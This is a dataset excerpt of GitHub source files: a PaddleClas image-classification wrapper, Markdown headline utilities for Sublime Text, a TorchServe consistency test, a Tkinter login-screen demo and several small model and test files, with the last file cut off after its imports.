max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars)
---|---|---|---|---|
myRL/algo/__init__.py | Shiduo-zh/pybulletSim | 562 | 12744723 | <reponame>Shiduo-zh/pybulletSim<gh_stars>100-1000
from .ppo import PPO
|
copy_memory/model.py | dnbaker/pytorch-dilated-rnn | 123 | 12744729 | from torch import nn
from drnn import DRNN
class DRNN_Copy(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, dropout, output_size):
super(DRNN_Copy, self).__init__()
self.drnn = DRNN(cell_type='GRU', dropout=dropout, n_hidden=hidden_size,
n_input=input_size, n_layers=num_layers, batch_first=True)
self.linear = nn.Linear(hidden_size, output_size)
self.init_weights()
def init_weights(self):
self.linear.weight.data.normal_(0,0.01)
def forward(self, x): # x: (batch, steps, input_size)
y1, _ = self.drnn(x) # y1: (batch, steps, hidden_size)
#import pdb
#pdb.set_trace()
return self.linear(y1) # (batch, steps, output_size) |
platform/polycommon/tests/test_gzip_decorator.py | admariner/polyaxon | 3,200 | 12744749 | <filename>platform/polycommon/tests/test_gzip_decorator.py
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from faker import Faker
from flaky import flaky
from rest_framework.response import Response
from rest_framework.views import APIView
from django.test import RequestFactory, TestCase
from polycommon.apis.gzip import gzip
class TestGZip(TestCase):
def setUp(self):
super(TestGZip, self).setUp()
fake = Faker()
class TestView(APIView):
@gzip()
def get(self, request, *args, **kwargs):
"""Example to check `Content-Encoding` header is set to 'gzip'."""
return Response(status=200, data=fake.text())
class SubClassTestView(TestView):
def get(self, request, *args, **kwargs):
"""Example to check that no status is set after overriding inherited endpoints."""
return Response(status=200, data=fake.text())
self.view = TestView.as_view()
self.subclass_view = SubClassTestView.as_view()
self.factory = RequestFactory()
@flaky(max_runs=3)
def test_content_encoding_is_set_correctly(self):
response = self.view(self.factory.get(""))
assert "Content-Encoding" in response
assert response["Content-Encoding"] == "gzip"
@flaky(max_runs=3)
def test_content_encoding_is_set_correctly_after_subclassing(self):
response = self.subclass_view(self.factory.get(""))
assert "Content-Encoding" not in response
|
paddleclas.py | Adgeros/PaddleClas | 3,763 | 12744764 | <gh_stars>1000+
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
__dir__ = os.path.dirname(__file__)
sys.path.append(os.path.join(__dir__, ""))
sys.path.append(os.path.join(__dir__, "deploy"))
from typing import Union, Generator
import argparse
import shutil
import textwrap
import tarfile
import requests
import warnings
from functools import partial
from difflib import SequenceMatcher
import cv2
import numpy as np
from tqdm import tqdm
from prettytable import PrettyTable
from deploy.python.predict_cls import ClsPredictor
from deploy.utils.get_image_list import get_image_list
from deploy.utils import config
from ppcls.arch.backbone import *
__all__ = ["PaddleClas"]
BASE_DIR = os.path.expanduser("~/.paddleclas/")
BASE_INFERENCE_MODEL_DIR = os.path.join(BASE_DIR, "inference_model")
BASE_IMAGES_DIR = os.path.join(BASE_DIR, "images")
BASE_DOWNLOAD_URL = "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/{}_infer.tar"
MODEL_SERIES = {
"AlexNet": ["AlexNet"],
"DarkNet": ["DarkNet53"],
"DeiT": [
"DeiT_base_distilled_patch16_224", "DeiT_base_distilled_patch16_384",
"DeiT_base_patch16_224", "DeiT_base_patch16_384",
"DeiT_small_distilled_patch16_224", "DeiT_small_patch16_224",
"DeiT_tiny_distilled_patch16_224", "DeiT_tiny_patch16_224"
],
"DenseNet": [
"DenseNet121", "DenseNet161", "DenseNet169", "DenseNet201",
"DenseNet264"
],
"DPN": ["DPN68", "DPN92", "DPN98", "DPN107", "DPN131"],
"EfficientNet": [
"EfficientNetB0", "EfficientNetB0_small", "EfficientNetB1",
"EfficientNetB2", "EfficientNetB3", "EfficientNetB4", "EfficientNetB5",
"EfficientNetB6", "EfficientNetB7"
],
"GhostNet":
["GhostNet_x0_5", "GhostNet_x1_0", "GhostNet_x1_3", "GhostNet_x1_3_ssld"],
"HRNet": [
"HRNet_W18_C", "HRNet_W30_C", "HRNet_W32_C", "HRNet_W40_C",
"HRNet_W44_C", "HRNet_W48_C", "HRNet_W64_C", "HRNet_W18_C_ssld",
"HRNet_W48_C_ssld"
],
"Inception": ["GoogLeNet", "InceptionV3", "InceptionV4"],
"MobileNetV1": [
"MobileNetV1_x0_25", "MobileNetV1_x0_5", "MobileNetV1_x0_75",
"MobileNetV1", "MobileNetV1_ssld"
],
"MobileNetV2": [
"MobileNetV2_x0_25", "MobileNetV2_x0_5", "MobileNetV2_x0_75",
"MobileNetV2", "MobileNetV2_x1_5", "MobileNetV2_x2_0",
"MobileNetV2_ssld"
],
"MobileNetV3": [
"MobileNetV3_small_x0_35", "MobileNetV3_small_x0_5",
"MobileNetV3_small_x0_75", "MobileNetV3_small_x1_0",
"MobileNetV3_small_x1_25", "MobileNetV3_large_x0_35",
"MobileNetV3_large_x0_5", "MobileNetV3_large_x0_75",
"MobileNetV3_large_x1_0", "MobileNetV3_large_x1_25",
"MobileNetV3_small_x1_0_ssld", "MobileNetV3_large_x1_0_ssld"
],
"RegNet": ["RegNetX_4GF"],
"Res2Net": [
"Res2Net50_14w_8s", "Res2Net50_26w_4s", "Res2Net50_vd_26w_4s",
"Res2Net200_vd_26w_4s", "Res2Net101_vd_26w_4s",
"Res2Net50_vd_26w_4s_ssld", "Res2Net101_vd_26w_4s_ssld",
"Res2Net200_vd_26w_4s_ssld"
],
"ResNeSt": ["ResNeSt50", "ResNeSt50_fast_1s1x64d"],
"ResNet": [
"ResNet18", "ResNet18_vd", "ResNet34", "ResNet34_vd", "ResNet50",
"ResNet50_vc", "ResNet50_vd", "ResNet50_vd_v2", "ResNet101",
"ResNet101_vd", "ResNet152", "ResNet152_vd", "ResNet200_vd",
"ResNet34_vd_ssld", "ResNet50_vd_ssld", "ResNet50_vd_ssld_v2",
"ResNet101_vd_ssld", "Fix_ResNet50_vd_ssld_v2", "ResNet50_ACNet_deploy"
],
"ResNeXt": [
"ResNeXt50_32x4d", "ResNeXt50_vd_32x4d", "ResNeXt50_64x4d",
"ResNeXt50_vd_64x4d", "ResNeXt101_32x4d", "ResNeXt101_vd_32x4d",
"ResNeXt101_32x8d_wsl", "ResNeXt101_32x16d_wsl",
"ResNeXt101_32x32d_wsl", "ResNeXt101_32x48d_wsl",
"Fix_ResNeXt101_32x48d_wsl", "ResNeXt101_64x4d", "ResNeXt101_vd_64x4d",
"ResNeXt152_32x4d", "ResNeXt152_vd_32x4d", "ResNeXt152_64x4d",
"ResNeXt152_vd_64x4d"
],
"SENet": [
"SENet154_vd", "SE_HRNet_W64_C_ssld", "SE_ResNet18_vd",
"SE_ResNet34_vd", "SE_ResNet50_vd", "SE_ResNeXt50_32x4d",
"SE_ResNeXt50_vd_32x4d", "SE_ResNeXt101_32x4d"
],
"ShuffleNetV2": [
"ShuffleNetV2_swish", "ShuffleNetV2_x0_25", "ShuffleNetV2_x0_33",
"ShuffleNetV2_x0_5", "ShuffleNetV2_x1_0", "ShuffleNetV2_x1_5",
"ShuffleNetV2_x2_0"
],
"SqueezeNet": ["SqueezeNet1_0", "SqueezeNet1_1"],
"SwinTransformer": [
"SwinTransformer_large_patch4_window7_224_22kto1k",
"SwinTransformer_large_patch4_window12_384_22kto1k",
"SwinTransformer_base_patch4_window7_224_22kto1k",
"SwinTransformer_base_patch4_window12_384_22kto1k",
"SwinTransformer_base_patch4_window12_384",
"SwinTransformer_base_patch4_window7_224",
"SwinTransformer_small_patch4_window7_224",
"SwinTransformer_tiny_patch4_window7_224"
],
"VGG": ["VGG11", "VGG13", "VGG16", "VGG19"],
"VisionTransformer": [
"ViT_base_patch16_224", "ViT_base_patch16_384", "ViT_base_patch32_384",
"ViT_large_patch16_224", "ViT_large_patch16_384",
"ViT_large_patch32_384", "ViT_small_patch16_224"
],
"Xception": [
"Xception41", "Xception41_deeplab", "Xception65", "Xception65_deeplab",
"Xception71"
]
}
class ImageTypeError(Exception):
"""ImageTypeError.
"""
def __init__(self, message=""):
super().__init__(message)
class InputModelError(Exception):
"""InputModelError.
"""
def __init__(self, message=""):
super().__init__(message)
def init_config(model_name,
inference_model_dir,
use_gpu=True,
batch_size=1,
topk=5,
**kwargs):
imagenet1k_map_path = os.path.join(
os.path.abspath(__dir__), "ppcls/utils/imagenet1k_label_list.txt")
cfg = {
"Global": {
"infer_imgs": kwargs["infer_imgs"]
if "infer_imgs" in kwargs else False,
"model_name": model_name,
"inference_model_dir": inference_model_dir,
"batch_size": batch_size,
"use_gpu": use_gpu,
"enable_mkldnn": kwargs["enable_mkldnn"]
if "enable_mkldnn" in kwargs else False,
"cpu_num_threads": kwargs["cpu_num_threads"]
if "cpu_num_threads" in kwargs else 1,
"enable_benchmark": False,
"use_fp16": kwargs["use_fp16"] if "use_fp16" in kwargs else False,
"ir_optim": True,
"use_tensorrt": kwargs["use_tensorrt"]
if "use_tensorrt" in kwargs else False,
"gpu_mem": kwargs["gpu_mem"] if "gpu_mem" in kwargs else 8000,
"enable_profile": False
},
"PreProcess": {
"transform_ops": [{
"ResizeImage": {
"resize_short": kwargs["resize_short"]
if "resize_short" in kwargs else 256
}
}, {
"CropImage": {
"size": kwargs["crop_size"]
if "crop_size" in kwargs else 224
}
}, {
"NormalizeImage": {
"scale": 0.00392157,
"mean": [0.485, 0.456, 0.406],
"std": [0.229, 0.224, 0.225],
"order": ''
}
}, {
"ToCHWImage": None
}]
},
"PostProcess": {
"main_indicator": "Topk",
"Topk": {
"topk": topk,
"class_id_map_file": imagenet1k_map_path
}
}
}
if "save_dir" in kwargs:
if kwargs["save_dir"] is not None:
cfg["PostProcess"]["SavePreLabel"] = {
"save_dir": kwargs["save_dir"]
}
if "class_id_map_file" in kwargs:
if kwargs["class_id_map_file"] is not None:
cfg["PostProcess"]["Topk"]["class_id_map_file"] = kwargs[
"class_id_map_file"]
cfg = config.AttrDict(cfg)
config.create_attr_dict(cfg)
return cfg
def args_cfg():
def str2bool(v):
return v.lower() in ("true", "t", "1")
parser = argparse.ArgumentParser()
parser.add_argument(
"--infer_imgs",
type=str,
required=True,
help="The image(s) to be predicted.")
parser.add_argument(
"--model_name", type=str, help="The model name to be used.")
parser.add_argument(
"--inference_model_dir",
type=str,
help="The directory of model files. Valid when model_name not specifed."
)
parser.add_argument(
"--use_gpu", type=str, default=True, help="Whether use GPU.")
parser.add_argument("--gpu_mem", type=int, default=8000, help="")
parser.add_argument(
"--enable_mkldnn",
type=str2bool,
default=False,
help="Whether use MKLDNN. Valid when use_gpu is False")
parser.add_argument("--cpu_num_threads", type=int, default=1, help="")
parser.add_argument(
"--use_tensorrt", type=str2bool, default=False, help="")
parser.add_argument("--use_fp16", type=str2bool, default=False, help="")
parser.add_argument(
"--batch_size", type=int, default=1, help="Batch size. Default by 1.")
parser.add_argument(
"--topk",
type=int,
default=5,
help="Return topk score(s) and corresponding results. Default by 5.")
parser.add_argument(
"--class_id_map_file",
type=str,
help="The path of file that map class_id and label.")
parser.add_argument(
"--save_dir",
type=str,
help="The directory to save prediction results as pre-label.")
parser.add_argument(
"--resize_short",
type=int,
default=256,
help="Resize according to short size.")
parser.add_argument(
"--crop_size", type=int, default=224, help="Centor crop size.")
args = parser.parse_args()
return vars(args)
def print_info():
"""Print list of supported models in formatted.
"""
table = PrettyTable(["Series", "Name"])
try:
sz = os.get_terminal_size()
width = sz.columns - 30 if sz.columns > 50 else 10
except OSError:
width = 100
for series in MODEL_SERIES:
names = textwrap.fill(" ".join(MODEL_SERIES[series]), width=width)
table.add_row([series, names])
width = len(str(table).split("\n")[0])
print("{}".format("-" * width))
print("Models supported by PaddleClas".center(width))
print(table)
print("Powered by PaddlePaddle!".rjust(width))
print("{}".format("-" * width))
def get_model_names():
"""Get the model names list.
"""
model_names = []
for series in MODEL_SERIES:
model_names += (MODEL_SERIES[series])
return model_names
def similar_architectures(name="", names=[], thresh=0.1, topk=10):
"""Find the most similar topk model names.
"""
scores = []
for idx, n in enumerate(names):
if n.startswith("__"):
continue
score = SequenceMatcher(None, n.lower(), name.lower()).quick_ratio()
if score > thresh:
scores.append((idx, score))
scores.sort(key=lambda x: x[1], reverse=True)
similar_names = [names[s[0]] for s in scores[:min(topk, len(scores))]]
return similar_names
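# Illustrative sketch (added for documentation; not part of the original
# module). The helper above ranks candidate names by string similarity via
# difflib.SequenceMatcher.quick_ratio(); the candidate list and the misspelled
# query below are made up.
def _demo_similar_architectures():
    candidates = ["ResNet50", "ResNet50_vd", "ResNet101", "MobileNetV3_large_x1_0"]
    # A misspelled query such as "ResNet_50" still surfaces the ResNet variants first.
    return similar_architectures("ResNet_50", candidates, thresh=0.1, topk=3)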
def download_with_progressbar(url, save_path):
"""Download from url with progressbar.
"""
if os.path.isfile(save_path):
os.remove(save_path)
response = requests.get(url, stream=True)
total_size_in_bytes = int(response.headers.get("content-length", 0))
block_size = 1024 # 1 Kibibyte
progress_bar = tqdm(total=total_size_in_bytes, unit="iB", unit_scale=True)
with open(save_path, "wb") as file:
for data in response.iter_content(block_size):
progress_bar.update(len(data))
file.write(data)
progress_bar.close()
if total_size_in_bytes == 0 or progress_bar.n != total_size_in_bytes or not os.path.isfile(
save_path):
raise Exception(
f"Something went wrong while downloading file from {url}")
def check_model_file(model_name):
"""Check the model files exist and download and untar when no exist.
"""
storage_directory = partial(os.path.join, BASE_INFERENCE_MODEL_DIR,
model_name)
url = BASE_DOWNLOAD_URL.format(model_name)
tar_file_name_list = [
"inference.pdiparams", "inference.pdiparams.info", "inference.pdmodel"
]
model_file_path = storage_directory("inference.pdmodel")
params_file_path = storage_directory("inference.pdiparams")
if not os.path.exists(model_file_path) or not os.path.exists(
params_file_path):
tmp_path = storage_directory(url.split("/")[-1])
print(f"download {url} to {tmp_path}")
os.makedirs(storage_directory(), exist_ok=True)
download_with_progressbar(url, tmp_path)
with tarfile.open(tmp_path, "r") as tarObj:
for member in tarObj.getmembers():
filename = None
for tar_file_name in tar_file_name_list:
if tar_file_name in member.name:
filename = tar_file_name
if filename is None:
continue
file = tarObj.extractfile(member)
with open(storage_directory(filename), "wb") as f:
f.write(file.read())
os.remove(tmp_path)
if not os.path.exists(model_file_path) or not os.path.exists(
params_file_path):
raise Exception(
f"Something went wrong while praparing the model[{model_name}] files!"
)
return storage_directory()
class PaddleClas(object):
"""PaddleClas.
"""
print_info()
def __init__(self,
model_name: str=None,
inference_model_dir: str=None,
use_gpu: bool=True,
batch_size: int=1,
topk: int=5,
**kwargs):
"""Init PaddleClas with config.
Args:
            model_name (str, optional): The model name supported by PaddleClas. If specified, it overrides the config. Defaults to None.
            inference_model_dir (str, optional): The directory containing the model file and params file to be used. If specified, it overrides the config. Defaults to None.
            use_gpu (bool, optional): Whether to use GPU. If specified, it overrides the config. Defaults to True.
            batch_size (int, optional): The batch size used for prediction. If specified, it overrides the config. Defaults to 1.
topk (int, optional): Return the top k prediction results with the highest score. Defaults to 5.
"""
super().__init__()
self._config = init_config(model_name, inference_model_dir, use_gpu,
batch_size, topk, **kwargs)
self._check_input_model()
self.cls_predictor = ClsPredictor(self._config)
def get_config(self):
"""Get the config.
"""
return self._config
def _check_input_model(self):
"""Check input model name or model files.
"""
candidate_model_names = get_model_names()
input_model_name = self._config.Global.get("model_name", None)
inference_model_dir = self._config.Global.get("inference_model_dir",
None)
if input_model_name is not None:
similar_names = similar_architectures(input_model_name,
candidate_model_names)
similar_names_str = ", ".join(similar_names)
if input_model_name not in candidate_model_names:
err = f"{input_model_name} is not provided by PaddleClas. \nMaybe you want: [{similar_names_str}]. \nIf you want to use your own model, please specify inference_model_dir!"
raise InputModelError(err)
self._config.Global.inference_model_dir = check_model_file(
input_model_name)
return
elif inference_model_dir is not None:
model_file_path = os.path.join(inference_model_dir,
"inference.pdmodel")
params_file_path = os.path.join(inference_model_dir,
"inference.pdiparams")
if not os.path.isfile(model_file_path) or not os.path.isfile(
params_file_path):
err = f"There is no model file or params file in this directory: {inference_model_dir}"
raise InputModelError(err)
return
else:
err = f"Please specify the model name supported by PaddleClas or directory contained model files(inference.pdmodel, inference.pdiparams)."
raise InputModelError(err)
return
def predict(self, input_data: Union[str, np.array],
print_pred: bool=False) -> Generator[list, None, None]:
"""Predict input_data.
Args:
input_data (Union[str, np.array]):
                When the type is str, it is the path of an image, a directory containing images, or the URL of an image on the Internet.
                When the type is np.array, it is the image data whose channel order is RGB.
            print_pred (bool, optional): Whether to print the prediction result. Defaults to False.
Raises:
ImageTypeError: Illegal input_data.
Yields:
Generator[list, None, None]:
                The prediction result(s) of input_data by batch_size. For each image, the
                prediction results are zipped into a dict that includes the top-k "class_ids", "scores" and "label_names".
                The format is as follows: [{"class_ids": [...], "scores": [...], "label_names": [...]}, ...]
"""
if isinstance(input_data, np.ndarray):
outputs = self.cls_predictor.predict(input_data)
yield self.cls_predictor.postprocess(outputs)
elif isinstance(input_data, str):
if input_data.startswith("http") or input_data.startswith("https"):
image_storage_dir = partial(os.path.join, BASE_IMAGES_DIR)
if not os.path.exists(image_storage_dir()):
os.makedirs(image_storage_dir())
image_save_path = image_storage_dir("tmp.jpg")
download_with_progressbar(input_data, image_save_path)
input_data = image_save_path
warnings.warn(
f"Image to be predicted from Internet: {input_data}, has been saved to: {image_save_path}"
)
image_list = get_image_list(input_data)
batch_size = self._config.Global.get("batch_size", 1)
topk = self._config.PostProcess.get('topk', 1)
img_list = []
img_path_list = []
cnt = 0
for idx, img_path in enumerate(image_list):
img = cv2.imread(img_path)
if img is None:
warnings.warn(
f"Image file failed to read and has been skipped. The path: {img_path}"
)
continue
img = img[:, :, ::-1]
img_list.append(img)
img_path_list.append(img_path)
cnt += 1
if cnt % batch_size == 0 or (idx + 1) == len(image_list):
outputs = self.cls_predictor.predict(img_list)
preds = self.cls_predictor.postprocess(outputs,
img_path_list)
if print_pred and preds:
for pred in preds:
filename = pred.pop("file_name")
pred_str = ", ".join(
[f"{k}: {pred[k]}" for k in pred])
print(
f"filename: {filename}, top-{topk}, {pred_str}")
img_list = []
img_path_list = []
yield preds
else:
err = "Please input legal image! The type of image supported by PaddleClas are: NumPy.ndarray and string of local path or Ineternet URL"
raise ImageTypeError(err)
return
# for CLI
def main():
"""Function API used for commad line.
"""
cfg = args_cfg()
clas_engine = PaddleClas(**cfg)
res = clas_engine.predict(cfg["infer_imgs"], print_pred=True)
for _ in res:
pass
print("Predict complete!")
return
if __name__ == "__main__":
main()
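# Illustrative Python-API sketch (added for documentation; not part of the
# original file). The image path below is hypothetical; predict() returns a
# generator that yields one list of results per batch.
def _example_python_api():
    clas = PaddleClas(model_name="ResNet50", use_gpu=False, topk=5)
    for batch_preds in clas.predict("path/to/your/image.jpg", print_pred=True):
        print(batch_preds)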
|
EthanBrown.SublimeText2.EditorPackages/tools/PackageCache/SmartMarkdown/headline.py | michaelray/Iristyle-ChocolateyPackages | 123 | 12744792 | """Some utility functions for working with headlines in Markdown.
Terminologies
- Headline :: The headline entity OR the text of the headline
- Content :: The content under the current headline. It stops after
encountering a headline with the same or higher level OR EOF.
"""
# Author: <NAME> <<EMAIL>>
import re
import sublime
try:
from .utilities import is_region_void
except ValueError:
from utilities import is_region_void
MATCH_PARENT = 1 # Match headlines at the same or higher level
MATCH_CHILD = 2 # Match headlines at the same or lower level
MATCH_SILBING = 3 # Only Match headlines at the same level.
MATCH_ANY = 4 # Any headlines would be matched.
ANY_LEVEL = -1 # level used when MATCH_ANY is used as match type
def region_of_content_of_headline_at_point(view, from_point):
"""Extract the region of the content of under current headline."""
_, level = headline_and_level_at_point(view, from_point)
if level == None:
return None
if is_content_empty_at_point(view, from_point):
return None
line_num, _ = view.rowcol(from_point)
content_line_start_point = view.text_point(line_num + 1, 0)
next_headline, _ = find_headline(view, \
content_line_start_point, \
level, \
True, \
MATCH_PARENT)
if not is_region_void(next_headline):
end_pos = next_headline.a - 1
else:
end_pos = view.size()
return sublime.Region(content_line_start_point, end_pos)
def headline_and_level_at_point(view, from_point, search_above_and_down=False):
"""Return the current headline and level.
If from_point is inside a headline, then return the headline and level.
Otherwise depends on the argument it might search above and down.
"""
line_region = view.line(from_point)
line_content = view.substr(line_region)
# Update the level in case it's headline.ANY_LEVEL
level = _extract_level_from_headline(line_content)
# Search above and down
if level is None and search_above_and_down:
# Search above
headline_region, _ = find_headline(view,\
from_point,\
ANY_LEVEL,
False,
skip_folded=True)
if not is_region_void(headline_region):
line_content, level = headline_and_level_at_point(view,\
headline_region.a)
# Search down
if level is None:
headline_region, _ = find_headline(view,\
from_point,\
ANY_LEVEL,
True,
skip_folded=True)
if not is_region_void(headline_region):
line_content, level = headline_and_level_at_point(view, headline_region.a)
return line_content, level
def _extract_level_from_headline(headline):
"""Extract the level of headline, None if not found.
"""
re_string = _get_re_string(ANY_LEVEL, MATCH_ANY)
match = re.match(re_string, headline)
if match:
return len(match.group(1))
else:
return None
def is_content_empty_at_point(view, from_point):
"""Check if the content under the current headline is empty.
    For implementation, check if the next line is a headline at the same
    or higher level.
"""
_, level = headline_and_level_at_point(view, from_point)
if level is None:
raise ValueError("from_point must be inside a valid headline.")
line_num, _ = view.rowcol(from_point)
next_line_region = view.line(view.text_point(line_num + 1, 0))
next_line_content = view.substr(next_line_region)
next_line_level = _extract_level_from_headline(next_line_content)
# Note that EOF works too in this case.
if next_line_level and next_line_level <= level:
return True
else:
return False
def find_headline(view, from_point, level, forward=True, \
match_type=MATCH_ANY, skip_headline_at_point=False, \
skip_folded=False):
"""Return the region of the next headline or EOF.
Parameters
----------
view: sublime.view
from_point: int
From which to find.
level: int
The headline level to match.
forward: boolean
Search forward or backward
match_type: int
MATCH_SILBING, MATCH_PARENT, MATCH_CHILD or MATCH_ANY.
skip_headline_at_point: boolean
        Whether to skip the headline at point when searching.
skip_folded: boolean
Whether to skip the folded region
Returns
-------
    match_region: sublime.Region
Matched region, or None if not found.
match_level: int
The level of matched headline, or None if not found.
"""
if skip_headline_at_point:
# Move the point to the next line if we are
        # currently in a headline already.
from_point = _get_new_point_if_already_in_headline(view, from_point,
forward)
re_string = _get_re_string(level, match_type)
if forward:
match_region = view.find(re_string, from_point)
else:
all_match_regions = view.find_all(re_string)
match_region = _nearest_region_among_matches_from_point(view, \
all_match_regions, \
from_point, \
False, \
skip_folded)
if skip_folded:
while (_is_region_folded(match_region, view)):
from_point = match_region.b
match_region = view.find(re_string, from_point)
if not is_region_void(match_region):
if not is_scope_headline(view, match_region.a):
return find_headline(view, match_region.a, level, forward, \
match_type, True, skip_folded)
else:
## Extract the level of matched headlines according to the region
headline = view.substr(match_region)
match_level = _extract_level_from_headline(headline)
else:
match_level = None
return (match_region, match_level)
def _get_re_string(level, match_type=MATCH_ANY):
"""Get regular expression string according to match type.
    Return a regular expression string rather than a compiled pattern, since
    Sublime's view.find function needs a string.
Parameters
----------
match_type: int
        MATCH_SILBING, MATCH_PARENT, MATCH_CHILD or MATCH_ANY.
"""
if match_type == MATCH_ANY:
re_string = r'^(#+)\s.*'
else:
try:
if match_type == MATCH_PARENT:
re_string = r'^(#{1,%d})\s.*' % level
elif match_type == MATCH_CHILD:
re_string = r'^(#{%d,})\s.*' % level
elif match_type == MATCH_SILBING:
re_string = r'^(#{%d,%d})\s.*' % (level, level)
except ValueError:
print("match_type has to be specified if level isn't ANY_LEVE")
return re_string
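# Illustrative sketch (added for documentation; not part of the original
# plugin). The patterns returned above can be exercised with plain `re`: for
# level 2, MATCH_PARENT accepts "#"/"##" headlines and MATCH_CHILD accepts
# "##" and deeper.
def _demo_re_string():
    assert re.match(_get_re_string(2, MATCH_PARENT), "# Top headline")
    assert re.match(_get_re_string(2, MATCH_CHILD), "### Sub-sub headline")
    assert _extract_level_from_headline("## Section") == 2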
def _get_new_point_if_already_in_headline(view, from_point, forward=True):
line_content = view.substr(view.line(from_point))
if _extract_level_from_headline(line_content):
line_num, _ = view.rowcol(from_point)
if forward:
return view.text_point(line_num + 1, 0)
else:
return view.text_point(line_num, 0) - 1
else:
return from_point
def is_scope_headline(view, from_point):
return view.score_selector(from_point, "markup.heading") > 0 or \
view.score_selector(from_point, "meta.block-level.markdown") > 0
def _nearest_region_among_matches_from_point(view, all_match_regions, \
from_point, forward=False,
skip_folded=True):
"""Find the nearest matched region among all matched regions.
None if not found.
"""
nearest_region = None
for r in all_match_regions:
if not forward and r.b <= from_point and \
(not nearest_region or r.a > nearest_region.a):
candidate = r
elif forward and r.a >= from_point and \
(not nearest_region or r.b < nearest_region.b):
candidate = r
else:
continue
if skip_folded and not _is_region_folded(candidate, view):
nearest_region = candidate
return nearest_region
def _is_region_folded(region, view):
for i in view.folded_regions():
if i.contains(region):
return True
return False
|
tools/deployment/test_torchserver.py | JiYuanFeng/mmclassification | 1,190 | 12744806 | from argparse import ArgumentParser
import numpy as np
import requests
from mmcls.apis import inference_model, init_model, show_result_pyplot
def parse_args():
parser = ArgumentParser()
parser.add_argument('img', help='Image file')
parser.add_argument('config', help='Config file')
parser.add_argument('checkpoint', help='Checkpoint file')
parser.add_argument('model_name', help='The model name in the server')
parser.add_argument(
'--inference-addr',
default='127.0.0.1:8080',
help='Address and port of the inference server')
parser.add_argument(
'--device', default='cuda:0', help='Device used for inference')
args = parser.parse_args()
return args
def main(args):
# Inference single image by native apis.
model = init_model(args.config, args.checkpoint, device=args.device)
model_result = inference_model(model, args.img)
show_result_pyplot(model, args.img, model_result, title='pytorch_result')
# Inference single image by torchserve engine.
url = 'http://' + args.inference_addr + '/predictions/' + args.model_name
with open(args.img, 'rb') as image:
response = requests.post(url, image)
server_result = response.json()
show_result_pyplot(model, args.img, server_result, title='server_result')
assert np.allclose(model_result['pred_score'], server_result['pred_score'])
print('Test complete, the results of PyTorch and TorchServe are the same.')
if __name__ == '__main__':
args = parse_args()
main(args)
|
tkinter/background-image/login/main-canvas.py | whitmans-max/python-examples | 140 | 12744807 |
#
# https://stackoverflow.com/a/47983927/1832058
#
import tkinter as tk
root = tk.Tk()
root.geometry('250x250')
root.title('Canvas')
canvas = tk.Canvas(root, width=250, height=250)
canvas.pack()
img = tk.PhotoImage(file='hal_9000.gif')
canvas.create_image((0, 0), image=img, anchor='nw')
canvas.create_text((10, 100), text='Username', anchor='w', fill='white', font=('Arial', 10))
canvas.create_text((10, 150), text='Password', anchor='w', fill='white', font=('Arial', 10))
name_entry = tk.Entry(canvas)
password_entry = tk.Entry(canvas, show='*')
canvas.create_window((240, 100), window=name_entry, anchor='e')
canvas.create_window((240, 150), window=password_entry, anchor='e')
root.mainloop()
|
google/datalab/utils/facets/feature_statistics_generator.py | freyrsae/pydatalab | 198 | 12744809 | <filename>google/datalab/utils/facets/feature_statistics_generator.py<gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class for generating the feature_statistics proto.
The proto is used as input for the Overview visualization.
"""
import warnings
from .base_feature_statistics_generator import BaseFeatureStatisticsGenerator
from . import feature_statistics_pb2 as fs
class FeatureStatisticsGenerator(BaseFeatureStatisticsGenerator):
"""Generator of stats proto from TF data."""
def __init__(self):
BaseFeatureStatisticsGenerator.__init__(self, fs.FeatureNameStatistics,
fs.DatasetFeatureStatisticsList,
fs.Histogram)
def ProtoFromTfRecordFiles(files,
max_entries=10000,
features=None,
is_sequence=False,
iterator_options=None):
"""Creates a feature statistics proto from a set of TFRecord files.
Args:
    files: A list of dicts describing files for each dataset for the proto.
      Each entry contains a 'path' field with the path to the TFRecord file
      on disk and a 'name' field to identify the dataset in the proto.
    max_entries: The maximum number of examples to load from each dataset
      in order to create the proto. Defaults to 10000.
    features: A list of strings that is a whitelist of feature names to
      create feature statistics for. If set to None then all features in the
      dataset are analyzed. Defaults to None.
    is_sequence: True if the input data from 'tables' are tf.SequenceExamples,
      False if tf.Examples. Defaults to False.
    iterator_options: Options to pass to the iterator that reads the examples.
      Defaults to None.
Returns:
The feature statistics proto for the provided files.
"""
warnings.warn(
'Use GenericFeatureStatisticsGenerator class method instead.',
DeprecationWarning)
return FeatureStatisticsGenerator().ProtoFromTfRecordFiles(
files, max_entries, features, is_sequence, iterator_options)
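# Illustrative sketch (added for documentation; not part of the original
# module). The `files` argument is a list of dicts with 'path' and 'name'
# keys; the paths below are hypothetical.
def _example_proto_from_tfrecords():
    files = [
        {"path": "/tmp/train.tfrecord", "name": "train"},
        {"path": "/tmp/test.tfrecord", "name": "test"},
    ]
    return ProtoFromTfRecordFiles(files, max_entries=1000)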
|
tools/make_server_cert.py | galenzhao/nodemcu-firmware | 7,567 | 12744813 | import os
import argparse
import base64
